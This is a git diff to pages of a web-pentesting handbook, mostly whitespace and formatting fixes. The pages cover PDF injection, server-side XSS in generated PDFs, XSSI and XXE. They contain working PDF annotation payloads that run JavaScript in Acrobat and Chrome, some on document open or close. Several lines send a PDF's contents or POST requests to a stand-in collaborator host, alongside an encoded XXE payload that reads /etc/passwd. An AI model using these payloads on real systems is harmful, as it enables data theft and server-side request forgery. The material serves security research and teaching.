 (function (){ return retFunc => String(arguments[0]) })(a=>{/* Hidden commment */})()
diff --git a/pentesting-web/xss-cross-site-scripting/pdf-injection.md b/pentesting-web/xss-cross-site-scripting/pdf-injection.md
index 0107c4eb..e93c4f86 100644
--- a/pentesting-web/xss-cross-site-scripting/pdf-injection.md
+++ b/pentesting-web/xss-cross-site-scripting/pdf-injection.md
@@ -2,35 +2,35 @@
 
 **If your input is being reflected inside a PDF file, you can try to inject PDF data to execute JavaScript or steal the PDF content.**
 
-The following information was taken from** **[**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)****
+The following information was taken from **** [**https://portswigger.net/research/portable-data-exfiltration**](https://portswigger.net/research/portable-data-exfiltration)****
 
 ### PDF-Lib
 
 This time, I was using [PDFLib](https://pdf-lib.js.org). I took some time to use the library to create an annotation and see if I could inject a closing parenthesis into the annotation URI - and it worked! The sample vulnerable code I used to generate the annotation code was:
 
-`...  `\
-` A: {`\
-`     Type: 'Action',`\
-`     S: 'URI',`\
-``     URI: PDFString.of(`injection)`),``\
-`   }`\
-`   })`\
-` ...`
+`...`  \
+&#x20;`A: {`\
+&#x20;    `Type: 'Action',`\
+&#x20;    `S: 'URI',`\
+&#x20;    ``URI: PDFString.of(`injection)`),``\
+&#x20;  `}`\
+&#x20;  `})`\
+&#x20;`...`
 
 [Full code:](https://github.com/PortSwigger/portable-data-exfiltration/blob/main/PDF-research-samples/pdf-lib/first-injection/test.js)
 
 How did I know the injection was successful? The PDF would render correctly unless I injected a closing parenthesis. This proved that the closing parenthesis was breaking out of the string and causing invalid PDF code. Breaking the PDF was nice, but I needed to ensure I could execute JavaScript of course. I looked at the rendered PDF code and noticed the output was being encoded using the FlateDecode filter. I wrote a little script to deflate the block and the output of the annotation section looked like this:`<<`\
-` /Type /Annot`\
-` /Subtype /Link`\
-` /Rect [ 50 746.89 320 711.89 ]`\
-` /Border [ 0 0 2 ]`\
-` /C [ 0 0 1 ]`\
-` /A <<`\
-` /Type /Action`\
-` /S /URI`\
-` /URI (injection))`\
-` >>`\
-` >>`
+&#x20;`/Type /Annot`\
+&#x20;`/Subtype /Link`\
+&#x20;`/Rect [ 50 746.89 320 711.89 ]`\
+&#x20;`/Border [ 0 0 2 ]`\
+&#x20;`/C [ 0 0 1 ]`\
+&#x20;`/A <<`\
+&#x20;`/Type /Action`\
+&#x20;`/S /URI`\
+&#x20;`/URI (injection))`\
+&#x20;`>>`\
+&#x20;`>>`
 
 As you can clearly see, the injection string is closing the text boundary with a closing parenthesis, which leaves an existing closing parenthesis that causes the PDF to be rendered incorrectly:
 
@@ -41,9 +41,9 @@ Great, so I could break the rendering of the PDF, now what? I needed to come up
 Just like how XSS vectors depend on the browser's parsing, PDF injection exploitability can depend on the PDF renderer. I decided to start by targeting Acrobat because I thought the vectors were less likely to work in Chrome. Two things I noticed: 1) You could inject additional annotation actions and 2) if you repair the existing closing parenthesis then the PDF would render. After some experimentation, I came up with a nice payload that injected an additional annotation action, executed JavaScript, and repaired the closing parenthesis:`/blah)>>/A<</S/JavaScript/JS(app.alert(1);)/Type/Action>>/>>(`
 
 First I break out of the parenthesis, then break out of the dictionary using >> before starting a new annotation dictionary. The /S/JavaScript makes the annotation JavaScript-based and the /JS is where the JavaScript is stored. Inside the parentheses is our actual JavaScript. Note that you don't have to escape the parentheses if they're balanced. Finally, I add the type of annotation, finish the dictionary, and repair the closing parenthesis. This was so cool; I could craft an injection that executed JavaScript but so what, right? You can execute JavaScript but you don't have access to the DOM, so you can't read cookies. Then James popped up and suggested stealing the contents of the PDF from the injection. I started looking at ways to get the contents of a PDF. In Acrobat, I discovered that you can use JavaScript to submit forms without any user interaction! Looking at the spec for the JavaScript API, it was pretty straightforward to modify the base injection and add some JavaScript that would send the entire contents of the PDF code to an external server in a POST request:`/blah)>>/A<</S/JavaScript/JS(app.alert(1);`\
-` this.submitForm({`\
-` cURL: 'https://your-id.burpcollaborator.net',cSubmitAs: 'PDF'}))`\
-` /Type/Action>>/>>(`
+&#x20;`this.submitForm({`\
+&#x20;`cURL: 'https://your-id.burpcollaborator.net',cSubmitAs: 'PDF'}))`\
+&#x20;`/Type/Action>>/>>(`
 
 The alert is not needed; I just added it to prove the injection was executing JavaScript.
 
@@ -52,32 +52,32 @@ Next, just for fun, I looked at stealing the contents of the PDF without using J
 To set a flag, you first need to look up its bit position (table 237 of the [PDF specification](https://www.adobe.com/content/dam/acom/en/devnet/pdf/pdfs/PDF32000\_2008.pdf)). In this case, we want to set the SubmitPDF flag. As this is controlled by the 9th bit, you just need to count 9 bits from the right:`0b00000100000000`
 
 If you evaluate this with JavaScript, this results in the decimal value 256. In other words, setting the Flags entry to 256 will enable the SubmitPDF flag, which causes the contents of the PDF to be sent when submitting the form. All we need to do is use the base injection we created earlier and modify it to call the SubmitForm action instead of JavaScript:`/blah)>>/A<</S/SubmitForm/Flags 256/F(`\
-` https://your-id.burpcollaborator.net)`\
-` /Type/Action>>/>>(`
+&#x20;`https://your-id.burpcollaborator.net)`\
+&#x20;`/Type/Action>>/>>(`
 
 ### sPDF
 
 Next I applied my methodology to another PDF library - [jsPDF](https://parall.ax/products/jspdf) - and found it was vulnerable too. Exploiting this library was quite fun because they have an API that can execute in the browser and will allow you to generate the PDF in real time as you type. I noticed that, like the PDP-Lib library, they forgot to escape parentheses inside annotation URLs. Here the url property was vulnerable:`doc.createAnnotation({bounds:`\
-` {x:0,y:10,w:200,h:200},`\
-`` type:'link',url:`/input`});``\
-` //vulnerable`
+&#x20;`{x:0,y:10,w:200,h:200},`\
+&#x20;``type:'link',url:`/input`});``\
+&#x20;`//vulnerable`
 
 So I generated a PDF using their API and injected PDF code into the url property:
 
 `var doc = new jsPDF();`\
-` doc.text(20, 20, 'Hello world!');`\
-` doc.addPage('a6','l');`\
-` doc.createAnnotation({bounds:`\
-``  {x:0,y:10,w:200,h:200},type:'link',url:` ``\
-` /blah)>>/A<</S/JavaScript/JS(app.alert(1);)/Type/Action/F 0/(`\
-`` `});``
+&#x20;`doc.text(20, 20, 'Hello world!');`\
+&#x20;`doc.addPage('a6','l');`\
+&#x20;`doc.createAnnotation({bounds:`\
+&#x20;`` {x:0,y:10,w:200,h:200},type:'link',url:` ``\
+&#x20;`/blah)>>/A<</S/JavaScript/JS(app.alert(1);)/Type/Action/F 0/(`\
+&#x20;`` `}); ``
 
 I reduced the vector by removing the type entries of the dictionary and the unneeded F entry. I then left a dangling parenthesis that would be closed by the existing one. Reducing the size of the injection is important because the web application you are injecting to might only allow a limited amount of characters.`/blah)>>/A<</S/JavaScript/JS(app.alert(1)`
 
 I then worked out that it was possible to reduce the vector even further! Acrobat would allow a URI and a JavaScript entry within one annotation action and would happily execute the JavaScript:`/)/S/JavaScript/JS(app.alert(1)`
 
-Further research revealed that you can also inject multiple annotations. This means that instead of just injecting an action, you could break out of the annotation and define your own rect coordinates to choose which section of the document would be clickable. Using this technique, I was able to make the entire document clickable.` /) >> >>`\
-` <</Type /Annot /Subtype /Link /Rect [0.00 813.54 566.93 -298.27] /Border [0 0`\
+Further research revealed that you can also inject multiple annotations. This means that instead of just injecting an action, you could break out of the annotation and define your own rect coordinates to choose which section of the document would be clickable. Using this technique, I was able to make the entire document clickable. `/) >> >>`\
+&#x20;`<</Type /Annot /Subtype /Link /Rect [0.00 813.54 566.93 -298.27] /Border [0 0`\
 `0] /A <</S/SubmitForm/Flags 0/F(https://your-id.burpcollaborator.net`
 
 ### Executing annotations without interaction
@@ -89,84 +89,84 @@ So far, the vectors I've demonstrated require a click to activate the action fro
 We can add the PV entry to the dictionary and the annotation will fire on Acrobat automatically! Not only that, but we can also execute a payload automatically when the PDF document is closed using the PC entry. An attacker could track you when you open the PDF and close it.
 
 Here's how to execute automatically from an annotation:`var doc = new jsPDF();`\
-`` doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/)``\
-` >> >>`\
-`` <</Subtype /Screen /Rect [0 0 900 900] /AA <</PV <</S/JavaScript/JS(app.alert(1))>>/(`});``\
-` doc.text(20, 20, 'Auto execute');`
+&#x20;``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/)``\
+&#x20;`>> >>`\
+&#x20;``<</Subtype /Screen /Rect [0 0 900 900] /AA <</PV <</S/JavaScript/JS(app.alert(1))>>/(`});``\
+&#x20;`doc.text(20, 20, 'Auto execute');`
 
 When you close the PDF, this annotation will fire:`var doc = new jsPDF();`\
-`` doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>``\
-`` <</Subtype /Screen /Rect [0 0 900 900] /AA <</PC <</S/JavaScript/JS(app.alert(1))>>/(`});``\
-` doc.text(20, 20, 'Close me');`
+&#x20;``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>``\
+&#x20;``<</Subtype /Screen /Rect [0 0 900 900] /AA <</PC <</S/JavaScript/JS(app.alert(1))>>/(`});``\
+&#x20;`doc.text(20, 20, 'Close me');`
 
 ### Chrome
 
 I've talked a lot about Acrobat but what about PDFium (Chrome's PDF reader)? Chrome is tricky; the attack surface is much smaller as its JavaScript support is more limited than Acrobat's. The first thing I noticed was that JavaScript wasn't being executed in annotations at all, so my proof of concepts weren't working. In order to get the vectors working in Chrome, I needed to at least execute JavaScript inside annotations. First though, I decided to try and overwrite a URL in an annotation. This was pretty easy. I could use the base injection I came up with before and simply inject another action with a URI entry that would overwrite the existing URL:`var doc = new jsPDF();`\
-`` doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/blah)>>/A<</S/URI/URI(https://portswigger.net)``\
-`` /Type/Action>>/F 0>>(`});``\
-` doc.text(20, 20, 'Test text');`
+&#x20;``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/blah)>>/A<</S/URI/URI(https://portswigger.net)``\
+&#x20;``/Type/Action>>/F 0>>(`});``\
+&#x20;`doc.text(20, 20, 'Test text');`
 
 This would navigate to portswigger.net when clicked. Then I moved on and tried different injections to call JavaScript, but this would fail every time. I thought it was impossible to do. I took a step back and tried to manually construct an entire PDF that would call JavaScript from a click in Chrome without an injection. When using an AcroForm button, Chrome would allow JavaScript execution, but the problem was it required references to parts of the PDF. I managed to craft an injection that would execute JavaScript from a click on JSPDF:`var doc = new jsPDF();`\
-`` doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0.825 0.8275 0.8275]/CA(Submit)>>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<</N <</Type/XObject/BBox[ 0 0 72 21.6]/Subtype/Form>>>>/Parent <</Kids[ 3 0 R]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(app.alert(1))/Type/Action/F 4/DA(blah`});``\
-` doc.text(20, 20, 'Click me test');`
+&#x20;``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0.825 0.8275 0.8275]/CA(Submit)>>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<</N <</Type/XObject/BBox[ 0 0 72 21.6]/Subtype/Form>>>>/Parent <</Kids[ 3 0 R]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(app.alert(1))/Type/Action/F 4/DA(blah`});``\
+&#x20;`doc.text(20, 20, 'Click me test');`
 
 As you can see, the above vector requires knowledge of the PDF structure. \[ 3 0 R] refers to a specific PDF object and if we were doing a blind PDF injection attack, we wouldn't know the structure of it. Still, the next stage is to try a form submission. We can use the submitForm function for this, and because the annotation requires a click, Chrome will allow it:`/) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0.0 813.54 566.93 -298.27]/CA(Submit)>>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<</N <</Type/XObject/BBox[ 0 0 72 21.6]/Subtype/Form>>>>/Parent <</Kids[ 3 0 R]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(app.alert(1);this.submitForm('https://your-id.burpcollaborator.net'))/Type/Action/F 4/DA(blah`
 
 This works, but it's messy and requires knowledge of the PDF structure. We can reduce it a lot and remove the reliance on the PDF structure:`#) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0 0 889 792]/CA(Submit)>>/Rect [ 0 0 889 792]/Subtype/Widget/AP<</N <</Type/XObject/Subtype/Form>>>>/Parent <</Kids[ ]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(`\
-`     app.alert(1)`\
-`     )/Type/Action/F 4/DA(blah`\
+&#x20;    `app.alert(1)`\
+&#x20;    `)/Type/Action/F 4/DA(blah`\
 ``
 
 There's still some code we can remove:`var doc = new jsPDF();`\
-`` doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>>>><</Type/Annot/Rect[ 0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(A)>>/A<</S/JavaScript/JS(app.alert(1))/(`});``\
-` doc.text(20, 20, 'Test text');`\
+&#x20;``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>>>><</Type/Annot/Rect[ 0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(A)>>/A<</S/JavaScript/JS(app.alert(1))/(`});``\
+&#x20;`doc.text(20, 20, 'Test text');`\
 ``
 
 The code above breaks out of the annotation, creates a new one, and makes the entire page clickable. In order for the JavaScript to execute, we have to inject a button and give it any text using the "T" entry. We can then finally inject our JavaScript code using the JS entry in the dictionary. Executing JavaScript on Chrome is great. I never thought it would be possible when I started this research.
 
 Next I looked at the submitForm function to steal the contents of the PDF. We know that we can call the function and it does contact an external server, as demonstrated in one of the examples above, but does it support the full Acrobat specification? I looked at the [source code of PDFium](https://github.com/PDFium/PDFium/blob/master/fpdfsdk/src/javascript/Document.cpp#L818) but the function doesn't support SubmitAsPDF :( You can see it supports FDF, but unfortunately this doesn't submit the contents of the PDF. I looked for other ways but I didn't know what objects were available. I took the same approach I did with Acrobat and wrote a fuzzer/enumerator to find interesting objects. Getting information out of Chrome was more difficult than Acrobat; I had to gather information in chunks before outputting it using the alert function. This was because the alert function truncated the string sent to it.`...`\
-`` doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(``\
-` (function(){`\
-` var obj = this,`\
-`     data = '',`\
-`     chunks = [],`\
-`     counter = 0,`\
-`     added = false, i, props = [];`\
-`     for(i in obj) {`\
-`         props.push(i);`\
-`     }`\
-` ...`
+&#x20;``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(``\
+&#x20;`(function(){`\
+&#x20;`var obj = this,`\
+&#x20;    `data = '',`\
+&#x20;    `chunks = [],`\
+&#x20;    `counter = 0,`\
+&#x20;    `added = false, i, props = [];`\
+&#x20;    `for(i in obj) {`\
+&#x20;        `props.push(i);`\
+&#x20;    `}`\
+&#x20;`...`
 
 [Full code](https://github.com/PortSwigger/portable-data-exfiltration/blob/main/PDF-research-samples/jsPDF/chrome/enumerator/test.js)
 
 Inspecting the output of the enumerator, I tried calling various functions in the hope of making external requests or gathering information from the PDF. Eventually, I found a very interesting function called getPageNthWord, which could extract words from the PDF document, thereby allowing me to steal the contents. The function has a subtle bug where the first word sometimes will not be extracted. But for the most part, it will extract the majority of words:`var doc = new jsPDF();`\
-`` doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(``\
-` words = [];`\
-` for(page=0;page<this.numPages;page++) {`\
-`     for(wordPos=0;wordPos<this.getPageNumWords(page);wordPos++) {`\
-`         word = this.getPageNthWord(page, wordPos, true);`\
-`         words.push(word);`\
-`     }`\
-` }`\
-` app.alert(words);`\
-``     `});``\
-` doc.text(20, 20, 'Click me test');`\
-` doc.text(20, 40, 'Abc Def');`\
-` doc.text(20, 60, 'Some word');`\
+&#x20;``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(``\
+&#x20;`words = [];`\
+&#x20;`for(page=0;page<this.numPages;page++) {`\
+&#x20;    `for(wordPos=0;wordPos<this.getPageNumWords(page);wordPos++) {`\
+&#x20;        `word = this.getPageNthWord(page, wordPos, true);`\
+&#x20;        `words.push(word);`\
+&#x20;    `}`\
+&#x20;`}`\
+&#x20;`app.alert(words);`\
+&#x20;    `` `}); ``\
+&#x20;`doc.text(20, 20, 'Click me test');`\
+&#x20;`doc.text(20, 40, 'Abc Def');`\
+&#x20;`doc.text(20, 60, 'Some word');`\
 ``
 
 I was pretty pleased with myself that I could steal the contents of the PDF on Chrome as I never thought this would be possible. Combining this with the submitForm vector would enable you to send the data to an external server. The only downside is that it requires a click. I wondered if you could get JavaScript execution without a click on Chrome. Looking at the PDF specification again, I noticed that there is another entry in the annotation dictionary called "E", which will execute the annotation when the mouse enters the annotation area - basically a mouseover event. Unfortunately, this does not count as user interaction to enable a form submission. So although you can execute JavaScript, you can't do anything with the data because you can't send it to an external server. If you can get Chrome to submit data with this event, please let me know because I'd be very interested to hear how. Anyway, here is the code to trigger a mouseover acton:`var doc = new jsPDF();`\
-`` doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>``\
-`` <</Type /Annot /Subtype /Widget /Parent<</FT/Btn/T(a)>> /Rect [0 0 900 900] /AA <</E <</S/JavaScript/JS(app.alert(1))>>/(`});``\
-` doc.text(20, 20, 'Test');`\
+&#x20;``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>``\
+&#x20;``<</Type /Annot /Subtype /Widget /Parent<</FT/Btn/T(a)>> /Rect [0 0 900 900] /AA <</E <</S/JavaScript/JS(app.alert(1))>>/(`});``\
+&#x20;`doc.text(20, 20, 'Test');`\
 ``
 
 ### SSRF in PDFium/Acrobat
 
 It's possible to send a POST request with PDFium/Acrobat to perform a SSRF attack. This would be a [blind SSRF](https://portswigger.net/web-security/ssrf/blind) since you can make a POST request but can't read the response. To construct a POST request, you can use the /parent dictionary key as demonstrated earlier to assign a form element to the annotation, enabling JavaScript execution. But instead of using a button like we did before, you can assign a text field (/Tx) with the parameter name (/T) and parameter value (/V) dictionary keys. Notice how you have to pass the parameter names you want to use to the submitForm function as an array:`#)>>>><</Type/Annot/Rect[ 0 0 900 900]/Subtype/Widget/Parent<</FT/Tx/T(foo)/V(bar)>>/A<</S/JavaScript/JS(`\
-` app.alert(1);`\
-` this.submitForm('https://aiws4u6uubgfdag94xvc5wbrfilc91.burpcollaborator.net', false, false, ['foo']);`\
-` )/(`\
+&#x20;`app.alert(1);`\
+&#x20;`this.submitForm('https://aiws4u6uubgfdag94xvc5wbrfilc91.burpcollaborator.net', false, false, ['foo']);`\
+&#x20;`)/(`\
 ``
 
 You can even send raw new lines, which could be useful when chaining other attacks such as [request smuggling](https://portswigger.net/web-security/request-smuggling). The result of the POST request can be seen in the following Collaborator request:
@@ -174,6 +174,6 @@ You can even send raw new lines, which could be useful when chaining other attac
 ![Screen shot showing a Burp Collaborator request from a PDF](https://portswigger.net/cms/images/3f/61/fd38-article-ssrf-screenshot.png)
 
 Finally, I want to finish with a hybrid Chrome and Acrobat PDF injection. The first part injects JavaScript into the existing annotation to execute JavaScript on Acrobat. The second part breaks out of the annotation and injects a new annotation that defines a new clickable area for Chrome. I use the Acroform trick again to inject a button so that the JavaScript will execute: `var doc = new jsPDF();`\
-`` doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)/S/JavaScript/JS(app.alert(1))/Type/Action>> >> <</Type/Annot/Rect[0 0 900 700]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(app.alert(1)`});``\
-` doc.text(20, 20, 'Click me Acrobat');`\
-` doc.text(20, 60, 'Click me Chrome');`
+&#x20;``doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)/S/JavaScript/JS(app.alert(1))/Type/Action>> >> <</Type/Annot/Rect[0 0 900 700]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(app.alert(1)`});``\
+&#x20;`doc.text(20, 20, 'Click me Acrobat');`\
+&#x20;`doc.text(20, 60, 'Click me Chrome');`
diff --git a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
index 657880cd..55008183 100644
--- a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
+++ b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
@@ -2,8 +2,8 @@
 
 ## Server Side XSS (Dynamic PDF)
 
-If a web page is creating a PDF using user controlled input, you can try to **trick the bot **that is creating the PDF into **executing arbitrary JS code**.\
-So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret **them, and you can **abuse** this behaviour to cause a **Server XSS**.
+If a web page is creating a PDF using user controlled input, you can try to **trick the bot** that is creating the PDF into **executing arbitrary JS code**.\
+So, if the **PDF creator bot finds** some kind of **HTML** **tags**, it is going to **interpret** them, and you can **abuse** this behaviour to cause a **Server XSS**.
 
 Please, notice that the `<script><\script>` tags don't work always, so you will need a different method to execute JS (for example, abusing `<img` ).\
 Also, note that in a regular exploitation you will be **able to see/download the created pdf**, so you will be able to see everything you **write via JS** (using `document.write()` for example). But, if you **cannot see** the created PDF, you will probably need **extract the information making web request to you** (Blind).
diff --git a/pentesting-web/xssi-cross-site-script-inclusion.md b/pentesting-web/xssi-cross-site-script-inclusion.md
index 0df87793..a2b6a3eb 100644
--- a/pentesting-web/xssi-cross-site-script-inclusion.md
+++ b/pentesting-web/xssi-cross-site-script-inclusion.md
@@ -6,7 +6,7 @@
 
 XSSI designates a kind of vulnerability which exploits the fact that, when a resource is included using the `script` tag, the SOP doesn’t apply, because scripts have to be able to be included cross-domain. An attacker can thus read everything that was included using the `script` tag.
 
- This is especially interesting when it comes to dynamic JavaScript or JSONP when so-called ambient-authority information like cookies are used for authentication. The cookies are included when requesting a resource from a different host.
+&#x20;This is especially interesting when it comes to dynamic JavaScript or JSONP when so-called ambient-authority information like cookies are used for authentication. The cookies are included when requesting a resource from a different host.
 
 ### Types
 
@@ -27,7 +27,7 @@ To exploit this, just include the script with private information inside the mal
 
 ## Dynamic-JavaScript-based-XSSI and Authenticated-JavaScript-XSSI
 
-**Confidential information is added to the script when a user requests it**. This can be easily discovered by sending the request **with and without the cookies**, if **different information **is retrieved, then confidential information could be contained. To do this automatically you can use burp extension: [https://github.com/luh2/DetectDynamicJS](https://github.com/luh2/DetectDynamicJS).
+**Confidential information is added to the script when a user requests it**. This can be easily discovered by sending the request **with and without the cookies**, if **different information** is retrieved, then confidential information could be contained. To do this automatically you can use burp extension: [https://github.com/luh2/DetectDynamicJS](https://github.com/luh2/DetectDynamicJS).
 
 If the information resides inside a global variable, you you can exploit it using the same code as for the the previous case.\
 If the confidential data is sent inside a JSONP response, you can override the executed function to retrieve the information:
@@ -77,7 +77,7 @@ Array.prototype.slice = function(){
 
 Security Researcher [Sebastian Lekies](https://twitter.com/slekies) just recently updated his list of [vectors](http://sebastian-lekies.de/leak/).
 
-##  Non-Script-XSSI
+## &#x20;Non-Script-XSSI
 
 Takeshi Terada describes another kind of XSSI in his paper [Identifier based XSSI attacks](https://www.mbsd.jp/Whitepaper/xssi.pdf). He was able to leak Non-Script files cross-origin by including, among others, CSV files as source in the `script` tag, using the data as variable and function names.
 
diff --git a/pentesting-web/xxe-xee-xml-external-entity.md b/pentesting-web/xxe-xee-xml-external-entity.md
index 5382eef4..ec7e7abf 100644
--- a/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/pentesting-web/xxe-xee-xml-external-entity.md
@@ -6,11 +6,11 @@ An XML External Entity attack is a type of attack against an application that pa
 
 **Most of this part was taken from this amazing Portswigger page:** [**https://portswigger.net/web-security/xxe/xml-entities**](https://portswigger.net/web-security/xxe/xml-entities)
 
-### What is XML? <a href="what-is-xml" id="what-is-xml"></a>
+### What is XML? <a href="#what-is-xml" id="what-is-xml"></a>
 
 XML stands for "extensible markup language". XML is a language designed for storing and transporting data. Like HTML, XML uses a tree-like structure of tags and data. Unlike HTML, XML does not use predefined tags, and so tags can be given names that describe the data. Earlier in the web's history, XML was in vogue as a data transport format (the "X" in "AJAX" stands for "XML"). But its popularity has now declined in favor of the JSON format.
 
-### What are XML entities? <a href="what-are-xml-entities" id="what-are-xml-entities"></a>
+### What are XML entities? <a href="#what-are-xml-entities" id="what-are-xml-entities"></a>
 
 XML entities are a way of representing an item of data within an XML document, instead of using the data itself. Various entities are built in to the specification of the XML language. For example, the entities `&lt;` and `&gt;` represent the characters `<` and `>`. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.
 
@@ -22,11 +22,11 @@ Element type declarations set the rules for the type and number of elements that
 * \<!ELEMENT stockCheck EMPTY> Means that it should be empty `<stockCheck></stockCheck>`
 * \<!ELEMENT stockCheck (productId,storeId)> Declares that `<stockCheck>` can have the children `<productId>` and `<storeId>`
 
-### What is document type definition? <a href="what-is-document-type-definition" id="what-is-document-type-definition"></a>
+### What is document type definition? <a href="#what-is-document-type-definition" id="what-is-document-type-definition"></a>
 
 The XML document type definition (DTD) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items. The DTD is declared within the optional `DOCTYPE` element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD") or can be loaded from elsewhere (known as an "external DTD") or can be hybrid of the two.
 
-### What are XML custom entities? <a href="what-are-xml-custom-entities" id="what-are-xml-custom-entities"></a>
+### What are XML custom entities? <a href="#what-are-xml-custom-entities" id="what-are-xml-custom-entities"></a>
 
 XML allows custom entities to be defined within the DTD. For example:
 
@@ -34,7 +34,7 @@ XML allows custom entities to be defined within the DTD. For example:
 
 This definition means that any usage of the entity reference `&myentity;` within the XML document will be replaced with the defined value: "`my entity value`".
 
-### What are XML external entities? <a href="what-are-xml-external-entities" id="what-are-xml-external-entities"></a>
+### What are XML external entities? <a href="#what-are-xml-external-entities" id="what-are-xml-external-entities"></a>
 
 XML external entities are a type of custom entity whose definition is located outside of the DTD where they are declared.
 
@@ -330,7 +330,7 @@ Those lines should be inserted in between the two root XML objects, like this, a
 
 ![Those lines should be inserted in between the two root XML objects, like thi](https://labs.detectify.com/wp-content/uploads/2021/09/xxe-obscure.png)
 
-All that is left is to** zip the file up to create your evil poc.docx file**. From the “unzipped” directory that we created earlier, run the following:
+All that is left is to **zip the file up to create your evil poc.docx file**. From the “unzipped” directory that we created earlier, run the following:
 
 ![From the "unzipped" directory that we created earlier, run the following:](https://labs.detectify.com/wp-content/uploads/2021/09/xxe-unzipped.png)
 
@@ -357,7 +357,7 @@ To be able to access files inside PKZIP files is **super useful to abuse XXE via
 4. It reads the `file.zip`
 5. It delete temporary files.
 
-Note that it's possible to stop the flow in the second step. The trick is to never close the connection when serving the file. [This tools can be useful](https://github.com/GoSecure/xxe-workshop/tree/master/24\_write_xxe/solution): one in python `slow_http_server.py` and one in java`slowserver.jar`.
+Note that it's possible to stop the flow in the second step. The trick is to never close the connection when serving the file. [This tools can be useful](https://github.com/GoSecure/xxe-workshop/tree/master/24\_write\_xxe/solution): one in python `slow_http_server.py` and one in java`slowserver.jar`.
 
 Once the server has downloaded your file, you need to find its location by browsing the temp directory. Being random, the file path can't be predict in advance.
 
@@ -520,7 +520,7 @@ This only work if the XML server accepts the `data://` protocol.
 
 ### UTF-7
 
-You can use the \[**"Encode Recipe**" of cyberchef here ]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28%27UTF-7%20%2865000%29%27%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) transform to UTF-7.
